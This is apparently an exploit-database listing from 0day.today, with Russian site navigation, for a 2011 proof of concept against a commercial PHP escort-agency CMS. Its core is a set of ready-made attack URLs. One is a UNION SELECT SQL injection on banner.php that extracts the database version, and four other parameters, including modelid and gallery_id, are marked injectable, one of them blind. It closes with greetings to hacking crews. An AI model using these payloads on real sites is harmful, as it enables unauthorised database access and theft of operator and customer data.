[ authorization ] [ registration ] [ Восстановление ]
Свяжитесь с нами
Вы можете связаться с нами по:
0day.today   магазин эксплоитов и 0day база данных эксплоитов

First Escort Marketing CMS Multiple SQL Injection Vunerabilities

Автор
NoNameMT
Риск
[
Security Risk Unsored
]
0day-ID
0day-ID-15910
Категория
web applications
Дата добавления
23-04-2011
Платформа
php
# PoC Title: First Escort Marketing CMS Multiple SQL Injection
Vunerabilities
# Platform: php
# Date: 18.04.2011
# Author: NoNameMT
# Software Link: http://www.first-escort-marketing.co.uk/agencies.html
# Price: 599 £
# Tested on: Windows 7
# Mail: [email protected]
# Homepage: http://nonamemt.us
 
# Proof of Concept:
http://site.com/escort_agency/banner.php?categoryID=-2'+union+select+1,version(),3,4,5,6,7--+
http://site.com/escort_agency/escort-profile.php?modelid=13'[Blind-SQL]
http://site.com/escort_agency/write_review.php?modelid=13'[SQL]
http://site.com/escort_agency/booking-form.php?modelid=13'[SQL]
http://site.com/escort_agency/gallery_escorts.php?gallery_id=13'[SQL]
 
# Greetings to:
Team-Internet, 4004-security-project.com, bursali, Easy Laster, Dr. Sp!c,
ezah, Xplo1t, enco



#  0day.today [2024-07-02]  #